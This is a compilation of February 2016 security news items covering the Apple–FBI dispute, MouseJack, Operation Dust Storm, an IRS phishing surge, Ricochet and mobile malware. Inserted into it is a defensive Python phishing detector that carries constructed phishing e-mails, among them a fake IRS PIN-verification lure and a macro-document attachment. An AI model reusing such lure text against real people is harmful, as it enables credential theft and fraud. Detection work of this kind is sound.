Although many big names in the technology industry, including Facebook, WhatsApp, and Google, have supported Apple's stand, many politicians including Donald Trump have criticized and opposed Apple.
...and the latest to oppose Apple's decision is Microsoft co-founder Bill Gates.
"Nobody's talking about a backdoor," Gates told Financial Times. "This is a specific case where the government is asking for access to information. They are not asking for some general thing, they are asking for a particular case."
However, in a separate interview later Tuesday with Bloomberg, Gates said he was "disappointed" with headlines based on the FT report claiming that he supported the FBI in its ongoing battle with Apple, saying "that does not state my view on this."
In the past, Microsoft has collaborated closely with US government agencies to allow its users' communications to be intercepted.
Microsoft helped the NSA (National Security Agency) to circumvent its own encryption and built a series of backdoors into Outlook.com, Skype, and SkyDrive to ease difficulties in accessing online communications, according to documents leaked by Edward Snowden.
Mother of San Bernardino Victim Supports Apple
Though the FBI, the DoJ, and politicians like Donald Trump are unable to understand the importance of privacy, a mother who lost her son in the San Bernardino, California terrorist attack last December says the right to privacy 'makes America great.'
Carole Adams, whose son Robert was killed in the terrorist attack last year, has supported Apple's stand on encryption and said the company is within its rights to protect the privacy of all United States citizens.
The battle between Apple and the FBI, in which the agency is asking the company to create a backdoored version of iOS for unlocking the shooter's iPhone 5C, is taking new twists and turns every day, so let's see who wins.
How to Hack a Computer from 100 Meters by Hijacking its Wireless Mouse or Keyboard
24.2.2016 Hacking
No matter how secure you think your computer might be, something malicious can always happen, as a computer is an open book to someone with the right tools and talent.
The same has been proved by a group of security researchers, who hacked into a computer with no internet connection and no Bluetooth devices.
Yes, it is possible for attackers to hack your computer through non-Bluetooth devices such as your wireless mouse and keyboard and install malware or a rootkit onto your machine.
That innocent-looking tiny dongle plugged into your USB port to transmit data between your wireless mouse and the computer is not as innocent as it pretends to be.
What's the Vulnerability?
Security researchers from the Internet of Things security firm Bastille have warned that wireless keyboards and mice from seven popular manufacturers, including Logitech, Dell, Microsoft, HP and Lenovo, are…
…vulnerable to so-called MouseJack attacks, leaving billions of computers exposed to hackers.
The flaw actually resides in the way these wireless mice and their corresponding radio receivers handle encryption.
The connection between the tiny dongle and the mouse is not encrypted; thus the dongle will accept any seemingly valid command.
How to Hijack Wireless Mouse and Hack Computer?
Wireless mice and keyboards communicate via radio frequency with a USB dongle inserted into the PC. The dongle then sends packets to the PC so that it follows the mouse clicks or keystrokes.
Most wireless keyboard manufacturers encrypt traffic between the keyboard and the dongle in an effort to prevent spoofing or hijacking of the device.
However, the mice tested by Bastille did not encrypt their communications to the dongle, allowing an attacker to spoof a mouse and install malware on the victim's PC.
With a long-range radio dongle costing around $15-$30 and a few lines of code, a malicious hacker within 100 meters of your computer could intercept the radio signal between the dongle plugged into your computer and your mouse.
The hacker can therefore send packets that generate keystrokes instead of mouse clicks, allowing the hacker to direct your computer to a malicious server or website in mere seconds.
During their tests, researchers were able to generate 1000 words/minute over the wireless connection and install a malicious Rootkit in about 10 seconds. They tested several mice from Logitech, Lenovo, and Dell that operate over 2.4GHz wireless communications.
Video Demonstration of MouseJack Attack
Who are Affected?
The following is the list of the wireless keyboard and mouse manufacturers whose non-Bluetooth wireless devices are affected by the MouseJack flaws:
Logitech
Dell
HP
Lenovo
Microsoft
Gigabyte
AmazonBasics
Billions of PC users with wireless dongles from any of the above manufacturers are at risk from the MouseJack flaw. Even Apple Macintosh and Linux users could be vulnerable to the attack.
These mice are distinct from Bluetooth mice, which are not affected by this security issue.
Many Wireless Devices will Never Receive any Patch
The researchers have already reported the security issue to all the seven manufacturers, but as of today, only Logitech has released a firmware update that blocks MouseJack attacks.
However, there are a large number of cheaper mice that do not have updatable firmware, so all of them will remain vulnerable forever, which could be a major issue in business environments where peripherals are often used for several years before being replaced.
Although Lenovo, HP, Amazon, and Gigabyte did not comment, a Dell spokesperson advised the users of the KM714 keyboard and mouse combo to get the Logitech firmware patch via Dell Tech Support and the KM632 Combo users to replace their devices.
Here's the list of affected devices, so if you are using one of them, it might be time to check for updates, and if not available, replace your existing peripheral.
For more in-depth knowledge, you can refer to the white paper explaining the technical details.
Anonymous hacked the French Ministry of Defense portal CIMD (Centre d'Identification des Materiels de la Defense)
24.2.2016 Hacking
Anonymous hacked the CIMD portal managed by the French Ministry of Defense to protest against French foreign arms trade operations.
The Anonymous collective has hacked one of the websites managed by the French Ministry of Defense, the CIMD (Centre d'Identification des Materiels de la Defense). The hacktivists accessed the database and leaked it online to protest against the country's foreign arms trade operations.
Anonymous accuses the French government of selling weapons to repressive regimes like Saudi Arabia. Anonymous also accuses the French authorities of using surveillance and hacking tools, as demonstrated by the documents leaked by WikiLeaks following the hack of the surveillance firm Hacking Team.
The incident was disclosed on February 22 by Anonymous; at the time, a "Our web portal will be temporarily unavailable due to maintenance actions" message was displayed to users of the CIMD portal.
The hackers leaked the database dump online; it contained sensitive information, including army supplier data and partner information, alongside login and FTP credentials and PHP sessions.
The archive includes usernames paired with cleartext passwords.
As proof of the hack, Anonymous also leaked pictures of the CIMD admin panel; experts who viewed the images speculate that the web portal was running a dated CMS.
“As a side note, after testing the vast majority of CMSs listed in Softpedia’s Webscripts section, I can say that the army’s portal looks like a very old content management platform, if not one custom made just for France’s Ministry of Defense.” wrote Catalin Cimpanu in a blog post published by Softpedia.
Anonymous highlighted the presence of a series of press articles in the CIMD archive that report the foreign arms trade operations of the French Government.
Anonymous also shared the link to a report published by Amnesty International in 2012 that listed France as the world's second largest arms trader.
Operation Dust Storm, hackers Target Japanese Critical Infrastructure
24.2.2016 Hacking
Japanese commercial and critical infrastructure organizations have been targeted by a long-running campaign dubbed Operation Dust Storm.
Security firm Cylance has uncovered a long-running hacking campaign dubbed 'Operation Dust Storm' targeting commercial and critical infrastructure organizations in Japan.
The threat actors behind Operation Dust Storm have been active since at least 2010; the hackers have targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.
Experts believe that the group is well-organized and well-funded, a circumstance that led the researchers to speculate on the involvement of a nation-state actor.
The researchers at Cylance revealed that the threat actors started focusing on Japanese organizations in 2015; the hackers breached the networks of Japanese organizations in the electricity generation, oil and natural gas, transportation, finance, and construction industries.
The list of victims includes an automaker, the Japanese subsidiary of a South Korean electric utility firm, and an oil and gas company.
The hackers demonstrated the availability of unique backdoors and zero-day exploits in their arsenal, used in watering hole and spear phishing attacks. In a number of attacks conducted in May 2015, the group also used several Android backdoors against targets in South Korea and Japan.
Fortunately, the attacks launched by the group behind Operation Dust Storm were not sophisticated. The researchers spotted the group in 2011, when the hackers relied on Adobe Flash Player (CVE-2011-0611) and Internet Explorer (CVE-2011-1255) zero-day vulnerabilities to deliver a strain of malware dubbed Misdat.
“Very little public information was available throughout 2010 on this threat, despite the group’s primary backdoor gaining some level of prominence in targeted Asian attacks” states the report published by Cylance “It wasn’t until June 2011 that Operation Dust Storm started to garner some notoriety from a series of attacks which leveraged an unpatched Internet Explorer 8 vulnerability, CVE-2011-1255, to gain a foothold into victim networks. “
In October 2011, the hackers focused on gathering intelligence about the Libyan crisis following the death of Muammar Gaddafi. In 2012, the group leveraged an Internet Explorer zero-day (CVE-2012-1889) in its cyber espionage campaigns.
Experts at Cylance noticed a significant reduction in Operation Dust Storm activity in March 2013, after the publication of Mandiant’s analysis of the Chinese APT group dubbed APT1.
In February 2014 the group behind Operation Dust Storm resurfaced, launching a series of attacks that leveraged a new Internet Explorer zero-day exploit (CVE-2014-0322) in watering hole attacks.
The researchers at Cylance have no doubt that attacks against Japanese critical infrastructure will rapidly increase in the future.
“However, our team believes that attacks of this nature on companies involved in Japanese critical infrastructure and resources are ongoing and are likely to continue to escalate in the future.” Cylance concluded.
Use of acid and lasers to access data stored on iPhones
24.2.2016 Apple
While Apple is refusing to support the FBI in the case of the San Bernardino shooter, Snowden says the FBI can use a decapping technique to crack iPhones.
Over the last few days there has been a huge discussion between Apple and the FBI in relation to access to San Bernardino terrorist Syed Farook’s iPhone. The FBI demands that the phone be hacked with Apple’s assistance so that the agency obtains full access to Farook’s iPhone data; however, Apple rejects the demand, backing its refusal with the idea of protecting the privacy of all iPhone users. Moreover, Apple publicly announced its dismissal of the court order, since providing such access would create a backdoor into Apple products which in turn would give experts and criminals unrestricted access to Apple customer data, thus opening the opportunity to spy on Apple users by intercepting phone calls and text messages and tracking their location through GPS.
The current debate has turned into an argument between Apple’s digital rights and the protection of its clients’ privacy on one side and, on the other, the FBI’s argument concerning Farook’s possible links to terrorist networks and the prevention of future terrorist plots, declaring that security and justice are more significant concerns than privacy (Ghosh, 2016).
According to FBI statements, access to San Bernardino terrorist Syed Farook’s iPhone 5c data is only possible with Apple’s assistance in creating a backdoor, because the FBI had already tried other methods, such as returning the iPhone to its home Wi-Fi network in the hope that the perpetrator’s data would back up automatically to iCloud; this failed because Farook seemed to have disabled the automatic update function. Another unsuccessful FBI technique was the attempt to access Farook’s iCloud account by resetting his Apple ID; however, the reset triggered an Apple security measure which prevented the backup of the iPhone data.
But Edward Snowden, the former NSA whistleblower, thinks otherwise. According to him, the FBI is not limited to this way of accessing Farook’s iPhone 5c content; instead, the FBI can rely on the use of acid and lasers to access the iPhone data without needing Apple to hack the iPhone.
“The problem is, the FBI has other means… They told the courts they didn’t, but they do. The FBI does not want to do this,” said Snowden.
The mechanism proposed by Snowden is well known as “chip decapping” (Ghosh, 2016).
Process of chip decapping
Chip decapping is a method in which the main processor chip is physically processed to extract its contents. The first step is the use of acid to get rid of the chip’s encapsulation, followed by a laser drilling down into the chip with the purpose of exposing the portion of the memory which holds the iPhone’s distinctive ID, the so-called UDID data.
The next step involves placing tiny probes on the spot where the data is, in order to gradually read out the UDID and the algorithm used to resolve it. After extracting the information, the FBI could transfer it to a supercomputer so the missing passcode can be recovered by trying all probable combinations until one unlocks the phone’s data. Furthermore, because the mechanism is carried out outside iOS, the danger that the data will be wiped or self-destruct is limited. Of course, this method also has weaknesses, and the most significant one is that a minor mistake during the procedure can destroy the chip, which in turn means that all access to the phone’s data is permanently lost (Goodin, 2016).
Infrared laser glitching
During an interview conducted by the media (ABC News) with an independent researcher, the decapping technique was discussed; the interviewee shared the opinion that this method would have doubtful success against an iPhone and would likely result in permanent loss of the content.
In addition, the interviewee suggested that infrared laser glitching would be a better option because the chance of losing the data is slightly reduced. The method involves slightly piercing the chip and then accessing the UID data through an infrared laser (Goodin, 2016).
Furthermore, this particular method proved effective in the past when hardware hacker Chris Tarnovsky conducted an attack that damaged a microcontroller and disabled the lockdown of the Xbox 360 game console. To perform his attack, Tarnovsky used an electron microscope, known as an ion beam workstation, which enabled him to examine the chip at the nanometer scale. As a result, he was able to manipulate and control its individual wires using microscopic needles. Such methods are therefore technically doable against an iPhone, but they lack practicality because the likelihood of destroying the hardware forever is significantly high and the effort these mechanisms demand is immense (Goodin, 2016).
The federal magistrate judge has ordered Apple to produce software which will be able to work against all older iPhones that lack modifications. This new software would provide the possibility of updating even when an iPhone uses “secure enclave” protections; in other words, the software would have functions to bypass secure enclave protections. The only thing Apple would be required to do is change the digital signature, at very little cost, so that the software could run on different devices (Goodin, 2016).
IRS is warning taxpayers of a new surge in tax-related incidents
23.2.2016 Incindent
It is a nightmare for taxpayers: according to an IRS bulletin there has been a 400 percent surge in tax-related phishing and malware incidents.
This year the IRS has already reported 1,026 malware and phishing incidents, compared to 254 at this time last year.
The IRS is warning taxpayers of newer forms of attack aimed at tricking victims into disclosing credentials for third-party tax preparation service accounts.
“The Internal Revenue Service renewed a consumer alert for e-mail schemes after seeing an approximate 400 percent surge in phishing and malware incidents so far this tax season.” states the bulletin. “The emails are designed to trick taxpayers into thinking these are official communications from the IRS or others in the tax industry, including tax software companies. The phishing schemes can ask taxpayers about a wide range of topics. E-mails can seek information related to refunds, filing status, confirming personal information, ordering transcripts and verifying PIN information.”
IRS Commissioner John Koskinen used the adjective “dramatic” to describe this surge in tax-related incidents, inviting taxpayers to watch out for scammers.
“This dramatic jump in these scams comes at the busiest time of tax season,” said Koskinen. “Watch out for fraudsters slipping these official-looking emails into inboxes, trying to confuse people at the very time they work on their taxes. We urge people not to click on these emails.”
Threat actors are very interested in using the tax season as a lure. In a common attack scenario, victims receive an email containing links to a domain used to serve malware. In other cases, the attackers use emails with attachments that include documents embedding malicious macros. Once the victim opens the document, the macro drops malware on the victim’s machine, including dreaded ransomware such as CryptoLocker, TeslaCrypt and Locky.
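As an added example (not from the IRS bulletin or the article), the following Python script applies the three warning signs described above to raw e-mail messages: a tax-themed lure from a sender outside irs.gov, links that lead away from irs.gov, and macro-enabled Office attachments. The sample messages and the single-domain allowlist are constructed for the example; the heuristics are deliberately simple and are meant as a starting point for mail-gateway triage, not as a complete phishing detector.

```python
import re
import email
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Lure topics named in the IRS bulletin: refunds, filing status, transcripts, PINs.
LURE_RE = re.compile(r"\b(irs|refund|filing status|transcript|pin|tax)\b", re.I)
IRS_NAME_RE = re.compile(r"\birs\b", re.I)
# File extensions that can carry VBA macros (the "malicious macro" delivery path).
MACRO_EXTENSIONS = (".docm", ".xlsm", ".pptm", ".dotm", ".xlam")
# Constructed allowlist: the only domain a genuine IRS sender or link should use.
LEGIT_DOMAINS = ("irs.gov",)


def _is_legit(host):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def assess_message(raw):
    """Return a list of findings for one RFC 822 message; empty list = nothing flagged."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    subject = str(msg["Subject"] or "")
    sender = str(msg["From"] or "")
    _, sender_addr = parseaddr(sender)
    sender_domain = sender_addr.rsplit("@", 1)[-1] if "@" in sender_addr else ""
    tax_lure = bool(LURE_RE.search(subject) or IRS_NAME_RE.search(sender))

    # Rule 1: tax-themed mail whose sender is not the IRS.
    if tax_lure and not _is_legit(sender_domain):
        findings.append("tax lure from non-IRS sender domain '%s'" % sender_domain)

    # Rule 2: tax-themed mail whose links lead away from irs.gov.
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    for url in re.findall(r"https?://[^\s\"'<>]+", text):
        host = urlparse(url).hostname
        if tax_lure and not _is_legit(host):
            findings.append("link to non-IRS host '%s'" % host)

    # Rule 3: macro-enabled Office attachment, regardless of theme.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(MACRO_EXTENSIONS):
            findings.append("macro-enabled attachment '%s'" % name)
    return findings


# Constructed sample messages (all domains are fictitious except irs.gov).
PHISH_MAIL = """\
From: "IRS e-Services" <notice@irs-refund-verify.example>
To: taxpayer@example.net
Subject: Your tax refund is pending - verify your filing status
Content-Type: text/plain; charset="us-ascii"

Please confirm your PIN at http://irs-refund-verify.example/login to release your refund.
"""

MACRO_MAIL = """\
From: "Tax Software Support" <support@taxsoft-update.example>
To: taxpayer@example.net
Subject: Updated W-2 transcript attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/plain; charset="us-ascii"

Open the attached transcript and enable editing to view.
--BOUND
Content-Type: application/vnd.ms-word.document.macroEnabled.12
Content-Disposition: attachment; filename="transcript.docm"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--BOUND--
"""

GENUINE_MAIL = """\
From: "Internal Revenue Service" <noreply@irs.gov>
To: taxpayer@example.net
Subject: Your transcript request
Content-Type: text/plain; charset="us-ascii"

Retrieve your transcript at https://www.irs.gov/individuals/get-transcript
"""

BENIGN_MAIL = """\
From: "Accounting" <payroll@example.net>
To: taxpayer@example.net
Subject: Lunch on Friday
Content-Type: text/plain; charset="us-ascii"

See you at noon.
"""

if __name__ == "__main__":
    for label, mail in (("phish", PHISH_MAIL), ("macro", MACRO_MAIL),
                        ("genuine", GENUINE_MAIL), ("benign", BENIGN_MAIL)):
        print(label, assess_message(mail))
```

The link rule only fires on tax-themed mail so that ordinary newsletters are not flagged, while the macro rule fires on every message, since a macro-enabled attachment from an unexpected sender warrants a look whatever the subject says.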
These are the alarming statistics provided by the IRS:
There were 1,026 incidents reported in January, up from 254 from a year earlier.
The trend continued in February, nearly doubling the reported number of incidents compared to a year ago. In all, 363 incidents were reported from Feb. 1-16, compared to the 201 incidents reported for the entire month of February 2015.
This year’s 1,389 incidents have already topped the 2014 yearly total of 1,361, and they are halfway to matching the 2015 total of 2,748.
Recently, IRS services have been abused by crooks to target taxpayers: in May 2015 the Internal Revenue Service was breached by hackers who “used an online service provided by the agency” to access data for more than 100,000 taxpayers. The IRS issued an official statement on the incident and specified that the compromised system was “Get Transcript.” The Get Transcript service could be used by taxpayers to obtain a transcript online or by mail in order to view their tax account transactions.
In August 2015, the Internal Revenue Service disclosed a new review of its systems, revealing that 334,000 taxpayers (more than three times its initial estimate) may have been affected by the hack it announced in May.
A couple of weeks ago the IRS detected unauthorized attempts using roughly 464,000 unique SSNs, of which 101,000 attempts allowed crooks to generate PINs.
The U.S. Internal Revenue Service confirmed that cyber criminals abused the Electronic Filing PIN application running on irs.gov that allows taxpayers to generate a PIN that they can use to file tax returns online.
Ricochet — Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata
23.2.2016 Safety
There are several encrypted messaging apps for mobile and desktop platforms that ship with a "The Most Secure" tagline but end up de-anonymizing the real identity of their users in one way or another.
In fact, very few encrypted messaging apps available today deal with the core problem of metadata.
The majority of apps offer end-to-end encryption that keeps the content of your messages away from prying eyes, but your metadata is still accessible to them, which is enough to reveal who you really are and who you're talking to.
But one messenger app stands out from the crowd by providing superb anonymity to its users, and it is called "Ricochet."
Ricochet is a peer-to-peer instant messaging system available for Windows, Mac, and Linux, and you can trust it more than most, as the app has already cleared its first professional security audit, carried out by cyber security company NCC Group.
What's so Promising about Ricochet?
Unlike other encrypted messaging clients, Ricochet makes use of Tor hidden services in an effort to maintain its users’ anonymity.
With hidden services, a user's traffic never leaves The Onion Router (Tor) network, which makes it much harder for prying eyes or any attacker to see where the traffic is going to or coming from.
Peer-to-Peer Connection: No Servers! No Operators!
Ricochet does not trust anyone to maintain the privacy of its users; thus, the developers have implemented the app without any server or operator that could be compromised and expose your personal details.
"The concept with Ricochet is: how can we do messaging without any server in the middle—without trusting anything to forward your messages to your contacts" John Brooks (Ricochet program's maintainer) stated.
"That turns out to be exactly one of the problems that hidden services can solve: to contact someone, without anybody in the middle knowing who you are or who you're contacting."
Here's How Ricochet Works
Ricochet is cross-platform and very easy to use, even for non-technical users.
Your Username: A Unique .Onion Address
Every Ricochet client hosts a Tor hidden service, and once you sign up for Ricochet, that hidden service address is actually your Ricochet ID: a unique .onion address.
Only someone with this .onion address can contact you and send messages, which means contacts connect to you through Tor and not through any intermediate server, making it extremely hard for anyone to learn your real identity from your address.
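How a Ricochet ID is bound to the client's own key, as an added example that is not part of the original article or of the Ricochet project's code: a Tor v2 hidden service address is the first 80 bits of the SHA-1 digest of the service's DER-encoded RSA public key, base32-encoded, and Ricochet 1.x prepends `ricochet:` to that address to form the user ID. The script below implements that derivation with only the Python standard library (a minimal DER encoder for the RSAPublicKey structure is written inline); the RSA modulus is a small constructed toy value rather than a real 1024-bit key, so the address it produces is for illustration only. Because the ID is a hash of the key, a peer who presents its key can be checked against the address it claims with no directory or server in the loop, which is the property the article describes.

```python
import base64
import hashlib


def _der_length(n):
    """DER length octets: short form below 128, long form (0x80 | count) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_integer(value):
    """DER INTEGER: tag 0x02, big-endian magnitude, leading 0x00 if the top bit is set."""
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + _der_length(len(body)) + body


def der_rsa_public_key(modulus, exponent):
    """RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER } (PKCS#1)."""
    content = _der_integer(modulus) + _der_integer(exponent)
    return b"\x30" + _der_length(len(content)) + content


def onion_v2_address(der_pubkey):
    """Tor v2 hidden service address: base32(SHA1(DER(RSAPublicKey))[:10]), lowercase."""
    digest = hashlib.sha1(der_pubkey).digest()
    return base64.b32encode(digest[:10]).decode("ascii").lower()


def ricochet_id(modulus, exponent=65537):
    """Ricochet 1.x user ID: the literal prefix 'ricochet:' plus the v2 onion address."""
    return "ricochet:" + onion_v2_address(der_rsa_public_key(modulus, exponent))


def verify_peer(claimed_id, modulus, exponent=65537):
    """A contact's ID is self-authenticating: recompute it from the key the peer presents."""
    return claimed_id == ricochet_id(modulus, exponent)


# Constructed 128-bit toy modulus; real v2 hidden services use 1024-bit RSA keys.
TOY_MODULUS = 0xC4F3A6D8E2B17F45C9A0D3E1F2B3C4D5

if __name__ == "__main__":
    my_id = ricochet_id(TOY_MODULUS)
    print(my_id)                                   # ricochet:<16 base32 chars>
    print(verify_peer(my_id, TOY_MODULUS))         # True: key matches the claimed ID
    print(verify_peer(my_id, TOY_MODULUS + 2))     # False: a different key cannot claim it
```

The 80-bit truncation is what makes the address short enough to share by hand, and it is also why the v2 scheme was later replaced: a hash that short is the weakest link in the binding between key and name, which is a point to keep in mind when an identity scheme leans entirely on an address.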
Ricochet Creates Huge Spike in Hidden Addresses
Security researcher Alan Woodward has noticed an unprecedented spike in the number of unique .onion hidden addresses on the Tor network in the month of February.
The statistics shared by the Tor Project show that the number of unique .onion sites increased by more than 25,000 within 2-3 days.
The researcher believes that this sudden rise could be due to the popularity of Ricochet, which creates a unique .onion address for every registered user.
Your Messages: End-to-End Encrypted By Default
Besides this, Ricochet also encrypts the contents of your messages by default.
So, to start chatting with someone over Ricochet, you first need to know their unique Ricochet ID, which is auto-generated at the time of the Ricochet installation.
Moreover, once the connection is terminated by either the sender or the receiver, the remaining party is no longer able to communicate with or send messages to the other.
Ricochet Takes Your Security Seriously
The audit by NCC Group discovered a security flaw that could be exploited to deanonymize users, but the good news is that the issue has been resolved in the latest release, Ricochet 1.1.2.
The security vulnerability was independently discovered by a member of the Ricochet community.
Ricochet has been around since 2014 and is now far more secure than other existing encrypted messaging apps. But the app is still in the dogfooding stage, as Brooks referred to in the "Be Careful" statement on the project's official website:
"Ricochet is an experiment. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software."
Download Now!
Brooks has already made it possible to report vulnerabilities publicly.
Currently, the app runs on desktop platforms including Windows, Mac, and Linux, and we can expect a mobile version of the app in the future.
You can download Ricochet for your desktop here.
For now, Brooks is looking to get funding from the open source community for the further development of Ricochet itself, such as implementing a file-sharing feature.
Pay-by-Selfie – MasterCard is replacing the customer password with his selfie
23.2.2016 Security
MasterCard announced the extension of its ‘pay-by-selfie’ facial recognition technology to 14 countries this summer, which means no more passwords.
The giant multinational financial services corporation MasterCard announced the extension of its ‘pay-by-selfie’ facial recognition technology to 14 countries this summer. In October, Mastercard announced the creation of a new payment method based on the Identity Check app, which lets users complete financial transactions by using their face.
Mastercard wants to increase security with biometric technology and improve the user experience, making it easy to authenticate users for ordinary operations like payments.
“As the world gets increasingly digital, this will be the next wave of technology that will change the consumer experience of shopping digitally,” Ajay Bhalla, president of enterprise security solutions for MasterCard, told USAToday. “It’s all part of our role in making commerce available anywhere, any time, on any digital device.”
How does it work?
The ‘pay-by-selfie’ facial recognition technology is simple to use; a customer only needs to download the Identity Check app. When a merchant requires the user to be identified before a purchase, the customer receives a push notification on their mobile device which triggers the mobile app. At this point, taking a selfie is enough to authorize the purchase.
Mastercard conducted tests in several countries before introducing the technology, and now considers it mature enough to be introduced in strategic markets like the British one.
The technology will drastically reduce the risk of identity fraud because it will be harder for hackers to take a victim’s picture without the user’s interaction. Data provided by Get Safe Online revealed that the top 10 internet fraud campaigns between September 2014 and August 2015 cost the UK over £268 million.
The company is proud to have reduced the attack surface, since customers no longer rely on inputting passwords that could easily be phished by fraudsters.
I had no opportunity to test the technology, but the first attack scenario that I have in mind is the infection of a mobile device that is able to steal a customer selfie and submit it in a stealthy way when a transaction must be authorized. Such malware needs to have access to the camera, the local storage and the applications, and needs the ability to intercept the push notifications.
Mastercard is investing in biometric authentication, including iris and voice recognition technologies; the most advanced studies are pushing the use of the heartbeat via a connected bracelet device.
According to Fortune, other banks are introducing biometric technology to improve the security of their customers: HSBC is working on voice recognition and touch identification, while Barclays introduced voice recognition to its private banking division in 2013.
Mobile malware evolution 2015
23.2.2016 Source: Kaspersky Mobil Virus
The year in figures
In 2015, Kaspersky Lab detected the following:
2,961,727 malicious installation packages
884,774 new malicious mobile programs – a threefold increase from the previous year
7,030 mobile banking Trojans
Trends of the year
Rise in the number of malicious attachments the user is unable to delete.
Cybercriminals actively using phishing windows to conceal legitimate apps.
Growth in the volume of ransomware.
Programs using super-user rights to display aggressive advertising.
Increase in the quantity of malware for iOS.
Main methods of monetization
Mobile malware continues to evolve towards monetization, with malware authors trying to ensure their creations are capable of making money from their victims.
Stealing money from user bank accounts
Mobile Trojans targeting user bank accounts continue to develop – in 2015, we detected 7,030 new mobile banking Trojans. Some malicious mobile programs work in combination with Windows-based Trojans to capture mTAN passwords (one-time passwords used in two-factor authentication) that are used for authorizing bank transactions. Many of the other mobile programs used to steal money from user bank accounts operate independently.
Some mobile malware is capable of overlaying the on-screen display of a legitimate banking app with a phishing window that imitates the app. The most notable examples of this type of program are Trojan-SMS.AndroidOS.OpFake.cc and the representatives of the Trojan-Banker.AndroidOS.Acecard family. One of the OpFake.cc modifications can imitate the interface of more than 100 legitimate banking and finance apps. The Acecard family can imitate at least 30 banking apps and also has functionality to overlay any app that the C&C server commands.
In Q2 2015, we wrote about Trojan-Spy.AndroidOS.SmsThief.fc whose malicious code was embedded in a legitimate banking app without affecting its performance. This meant it was highly unlikely a user would notice the malware.
The authors of mobile malware are taking an increasingly integrated approach to stealing money: it is no longer limited to special banking Trojans targeting banking apps.
An example of this approach is Trojan-SMS.AndroidOS.FakeInst.ep. What the users see is a message, purportedly from Google, demanding that they open Google Wallet and go through an ‘identification’ procedure that involves entering their credit card details (one of the reasons given is the need to combat cybercrime). The window cannot be removed until the victim enters their credit card details.
Once users enter the required data, it is sent to attackers, and the window closes. Meanwhile, the Trojan continues to steal information and send additional information to its owners about the smartphone and its user.
Against a background of slowing growth in the number of specialized banking Trojans, the total number of apps that can steal money from users is growing. This comes at a time when banking Trojans are becoming more sophisticated and versatile – they are often capable of attacking customers of dozens of banks located in a variety of countries. This means cybercriminals do not need lots of different files to attack the customers of different banks.
Ransomware
The amount of Trojan-Ransom families doubled in 2015 compared to the previous year, while the number of detected modifications increased 3.5 times. This means some criminals are switching to ransomware to steal money, and those who were already doing so are continuing to create new versions of the malware. Yet another key indicator confirming the importance of this class of threat is the number of people who were attacked: in 2015, this figure increased fivefold.
In most cases when these Trojans block a device, the user is accused of committing some alleged misdemeanor, and has to pay to unblock the device – the ransom can range from $12 to $100. The blocked device is rendered inoperable – the user only sees a window with the ransom demand. Some Trojans are capable of overlaying system dialog boxes, including those used to switch off the phone.
The window opened by Fusob
At the end of the year we detected several Trojan downloaders that downloaded Trojan-Ransom.AndroidOS.Pletor in the system. These Trojan downloaders exploit vulnerabilities in the system to gain super-user privileges on the device and install Trojan-Ransom malware in the system folder. Once installed, this Trojan is almost impossible to remove.
SMS Trojans remained a serious threat, particularly in Russia. These programs send paid text messages from an infected device without the user being aware. Although their share in the overall flow of mobile threats continues to decline, the number of SMS Trojans in absolute terms remains substantial.
Some SMS Trojans are not limited to the sending of text messages to premium numbers; they can also connect the user to paid subscriptions. In 2015, we kept track of how Trojan-SMS.AndroidOS.Podec – still one of the most popular Trojans among cybercriminals – was developing. This Trojan boasts an unusual feature: its main method of monetization is paid subscriptions. It is capable of bypassing Captcha, and its latest modifications have “lost” the ability to send text messages as its creators have focused on subscriptions.
Aggressive advertising
In 2015, we recorded an increase in the number of programs that use advertising as the main means of monetization. The trend of the year was Trojans using super-user privileges. In the first quarter of 2015, the mobile malware TOP 20 contained just one Trojan of this type; by the end of the year they made up more than half of the rating. Despite the fact that these Trojans are designed to download and install advertising applications without the user’s knowledge, they can cause a lot of problems. Once installed, they try to root the device and install their own components in the system making them difficult to remove. Some of them remain on a smartphone even after resetting to factory settings. As a result, the user is inundated with annoying ads on the device. They can also install lots of other programs, including malware, on the device without the user being aware. There have been cases of this type of program being distributed in the official firmware of devices or being pre-installed on new phones.
Malware in official stores
In early October 2015 we came across several Trojans in the official Google Play Store that stole user passwords from the Russian social network VKontakte. These were Trojan-PSW.AndroidOS.MyVk.a and Trojan-PSW.AndroidOS.Vkezo.a. About a month later we detected a new modification of the Trojan Vkezo which was also distributed via Google Play Store. The attackers published these Trojans 10 times in the official app store under different names over a period of several months. The number of downloads for all versions of these Trojans was put at between 100 000 and 500 000. Yet another Trojan detected in Google Play Store was Trojan-Downloader.AndroidOS.Leech; it was also downloaded between 100 000 and 500 000 times.
Malware for iOS
In 2015, the number of malicious programs for iOS increased 2.1 times compared to 2014.
The recent emergence of malicious apps in the App Store once again demonstrated that, contrary to popular belief, iOS is not invulnerable to malware. The attackers did not hack App Store, but instead posted a malicious version of Apple’s Xcode, a free set of tools that developers use to create applications for iOS, on the Internet.
Apple’s Xcode is officially distributed by Apple, but it is unofficially spread by third parties. Some Chinese vendors prefer to download the development tools from local servers. Someone posted an Xcode version containing malicious XcodeGhost on a third-party server in China. Malicious code is embedded in any application compiled using this version of Xcode.
XcodeGhost infected dozens of applications. Initially it was thought that 39 infected apps had bypassed the Apple testing procedure and had been successfully downloaded to the App Store. The most popular of them was WeChat, a free messenger installed on more than 700 million user devices. Apple removed the infected apps. However, the hacked version of Xcode was available for about six months, so the total number of infected applications might be much higher, not least because the source code for XcodeGhost was published on Github.
